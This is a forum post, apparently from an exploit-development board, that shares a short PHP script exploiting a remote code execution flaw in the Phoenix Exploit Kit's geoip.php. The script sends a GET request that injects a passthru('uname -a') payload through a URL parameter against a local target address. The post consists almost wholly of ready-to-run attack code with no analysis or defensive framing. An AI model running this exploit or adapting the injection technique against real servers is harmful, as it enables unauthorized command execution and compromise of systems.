Jump to content
Jako

[PHP] Phoenix Exploit Kit RCE

By Jako, in Reverse engineering & exploit development

Recommended Posts

Jako Newbie

Jako

Posted
Posted 
<?php
/*
#
# Phoenix Exploit Kit
# 	- Remote Code Execution
#	: /includes/geoip.php
*/

$site = "http://127.0.0.1/phoenix/";
$target = "includes/geoip.php?bdr=";
$payload = "passthru('uname -a')";

function curl_get($url) {
	$ch = curl_init();
	curl_setopt($ch, CURLOPT_URL, $url);
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
	curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1");
	$output = curl_exec($ch);
	curl_close($ch);
	return $output;
}

echo curl_get($site.$target.$payload);

?>

 

  • Upvote 1
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...